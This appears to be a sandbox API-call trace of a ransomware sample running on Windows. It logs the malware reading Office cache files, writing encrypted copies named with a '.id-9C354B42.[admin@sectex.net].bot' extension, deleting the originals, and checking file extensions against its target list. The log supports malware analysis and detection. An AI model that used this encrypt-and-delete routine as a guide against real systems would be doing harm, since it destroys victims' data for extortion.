	[0035.283] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0035.284] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=2624) returned 1
	[0035.284] CloseHandle (hObject=0x18c) returned 1
	[0035.284] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020
	[0035.284] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.284] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0035.284] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.284] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.284] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0035.284] GetLastError () returned 0x0
	[0035.284] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0xa40, lpOverlapped=0x0) returned 1
	[0035.497] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xa50, lpOverlapped=0x0) returned 1
	[0035.498] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0035.498] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0035.498] SetEndOfFile (hFile=0x180) returned 1
	[0035.498] CloseHandle (hObject=0x180) returned 1
	[0035.501] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.501] SetEndOfFile (hFile=0x18c) returned 1
	[0035.501] CloseHandle (hObject=0x18c) returned 1
	[0035.501] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0035.502] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1
	[0035.502] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.502] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.502] lstrlenW (lpString=".doc") returned 4
	[0035.502] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.502] lstrlenW (lpString=".docx") returned 5
	[0035.502] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0035.502] lstrlenW (lpString=".pdf") returned 4
	[0035.502] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.502] lstrlenW (lpString=".xls") returned 4
	[0035.502] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.502] lstrlenW (lpString=".xlsx") returned 5
	[0035.502] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0035.502] lstrlenW (lpString=".ppt") returned 4
	[0035.502] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.502] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.502] lstrlenW (lpString=".zip") returned 4
	[0035.502] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.502] lstrlenW (lpString=".rar") returned 4
	[0035.502] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.502] lstrlenW (lpString=".bz2") returned 4
	[0035.502] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.503] lstrlenW (lpString=".7z") returned 3
	[0035.503] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.503] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.503] lstrlenW (lpString=".dbf") returned 4
	[0035.503] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.503] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.503] lstrlenW (lpString=".1cd") returned 4
	[0035.503] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.503] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.503] lstrlenW (lpString=".jpg") returned 4
	[0035.503] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.503] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.503] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.503] lstrlenW (lpString=".doc") returned 4
	[0035.503] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.503] lstrlenW (lpString=".docx") returned 5
	[0035.503] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0035.503] lstrlenW (lpString=".pdf") returned 4
	[0035.503] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.503] lstrlenW (lpString=".xls") returned 4
	[0035.503] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.503] lstrlenW (lpString=".xlsx") returned 5
	[0035.503] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0035.503] lstrlenW (lpString=".ppt") returned 4
	[0035.503] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.503] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.503] lstrlenW (lpString=".zip") returned 4
	[0035.503] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.503] lstrlenW (lpString=".rar") returned 4
	[0035.503] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.503] lstrlenW (lpString=".bz2") returned 4
	[0035.503] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.503] lstrlenW (lpString=".7z") returned 3
	[0035.504] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.504] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.504] lstrlenW (lpString=".dbf") returned 4
	[0035.504] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.504] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.504] lstrlenW (lpString=".1cd") returned 4
	[0035.504] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.504] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.504] lstrlenW (lpString=".jpg") returned 4
	[0035.504] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.504] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0035.504] lstrlenW (lpString="Office32WW.xml") returned 14
	[0035.504] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0035.505] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=4274) returned 1
	[0035.505] CloseHandle (hObject=0x18c) returned 1
	[0035.505] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020
	[0035.505] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.505] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0035.505] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.505] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.505] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0035.506] GetLastError () returned 0x0
	[0035.506] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x10b2, lpOverlapped=0x0) returned 1
	[0035.581] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x10c0, lpOverlapped=0x0) returned 1
	[0035.582] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0035.582] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0035.582] SetEndOfFile (hFile=0x180) returned 1
	[0035.582] CloseHandle (hObject=0x180) returned 1
	[0035.583] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.583] SetEndOfFile (hFile=0x18c) returned 1
	[0035.584] CloseHandle (hObject=0x18c) returned 1
	[0035.584] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0035.584] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1
	[0035.585] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.585] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.585] lstrlenW (lpString=".doc") returned 4
	[0035.585] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.585] lstrlenW (lpString=".docx") returned 5
	[0035.585] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1
	[0035.585] lstrlenW (lpString=".pdf") returned 4
	[0035.585] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.585] lstrlenW (lpString=".xls") returned 4
	[0035.585] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.585] lstrlenW (lpString=".xlsx") returned 5
	[0035.585] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1
	[0035.585] lstrlenW (lpString=".ppt") returned 4
	[0035.585] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.585] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.585] lstrlenW (lpString=".zip") returned 4
	[0035.585] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.585] lstrlenW (lpString=".rar") returned 4
	[0035.585] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.585] lstrlenW (lpString=".bz2") returned 4
	[0035.585] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.585] lstrlenW (lpString=".7z") returned 3
	[0035.585] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.585] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.585] lstrlenW (lpString=".dbf") returned 4
	[0035.585] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.585] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.585] lstrlenW (lpString=".1cd") returned 4
	[0035.585] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.586] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.586] lstrlenW (lpString=".jpg") returned 4
	[0035.586] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.586] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.586] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.586] lstrlenW (lpString=".doc") returned 4
	[0035.586] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.586] lstrlenW (lpString=".docx") returned 5
	[0035.586] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1
	[0035.586] lstrlenW (lpString=".pdf") returned 4
	[0035.586] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.586] lstrlenW (lpString=".xls") returned 4
	[0035.586] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.586] lstrlenW (lpString=".xlsx") returned 5
	[0035.586] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1
	[0035.586] lstrlenW (lpString=".ppt") returned 4
	[0035.586] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.586] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.586] lstrlenW (lpString=".zip") returned 4
	[0035.586] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.586] lstrlenW (lpString=".rar") returned 4
	[0035.586] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.586] lstrlenW (lpString=".bz2") returned 4
	[0035.586] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.586] lstrlenW (lpString=".7z") returned 3
	[0035.586] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.586] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.586] lstrlenW (lpString=".dbf") returned 4
	[0035.586] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.586] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.586] lstrlenW (lpString=".1cd") returned 4
	[0035.586] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.586] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.586] lstrlenW (lpString=".jpg") returned 4
	[0035.586] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.587] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0035.587] lstrlenW (lpString="Setup.xml") returned 9
	[0035.587] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0035.587] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=20577) returned 1
	[0035.587] CloseHandle (hObject=0x18c) returned 1
	[0035.587] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020
	[0035.587] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.587] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0035.587] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.587] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.587] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0035.588] GetLastError () returned 0x0
	[0035.588] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x5061, lpOverlapped=0x0) returned 1
	[0035.597] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x5070, lpOverlapped=0x0) returned 1
	[0035.598] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0035.598] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0035.598] SetEndOfFile (hFile=0x180) returned 1
	[0035.598] CloseHandle (hObject=0x180) returned 1
	[0035.599] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.599] SetEndOfFile (hFile=0x18c) returned 1
	[0035.600] CloseHandle (hObject=0x18c) returned 1
	[0035.600] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0035.600] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1
	[0035.601] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.601] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.601] lstrlenW (lpString=".doc") returned 4
	[0035.601] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.601] lstrlenW (lpString=".docx") returned 5
	[0035.601] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0035.601] lstrlenW (lpString=".pdf") returned 4
	[0035.601] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.601] lstrlenW (lpString=".xls") returned 4
	[0035.601] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.601] lstrlenW (lpString=".xlsx") returned 5
	[0035.601] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0035.601] lstrlenW (lpString=".ppt") returned 4
	[0035.602] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.602] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.602] lstrlenW (lpString=".zip") returned 4
	[0035.602] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.602] lstrlenW (lpString=".rar") returned 4
	[0035.602] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.602] lstrlenW (lpString=".bz2") returned 4
	[0035.602] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.602] lstrlenW (lpString=".7z") returned 3
	[0035.602] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.602] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.602] lstrlenW (lpString=".dbf") returned 4
	[0035.602] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.602] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.602] lstrlenW (lpString=".1cd") returned 4
	[0035.602] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.602] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.602] lstrlenW (lpString=".jpg") returned 4
	[0035.602] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.602] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.602] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.602] lstrlenW (lpString=".doc") returned 4
	[0035.602] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.602] lstrlenW (lpString=".docx") returned 5
	[0035.602] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0035.602] lstrlenW (lpString=".pdf") returned 4
	[0035.602] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.602] lstrlenW (lpString=".xls") returned 4
	[0035.602] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.602] lstrlenW (lpString=".xlsx") returned 5
	[0035.602] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0035.602] lstrlenW (lpString=".ppt") returned 4
	[0035.602] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.602] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.603] lstrlenW (lpString=".zip") returned 4
	[0035.603] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.603] lstrlenW (lpString=".rar") returned 4
	[0035.603] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.603] lstrlenW (lpString=".bz2") returned 4
	[0035.603] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.603] lstrlenW (lpString=".7z") returned 3
	[0035.603] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.603] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.603] lstrlenW (lpString=".dbf") returned 4
	[0035.603] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.603] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.603] lstrlenW (lpString=".1cd") returned 4
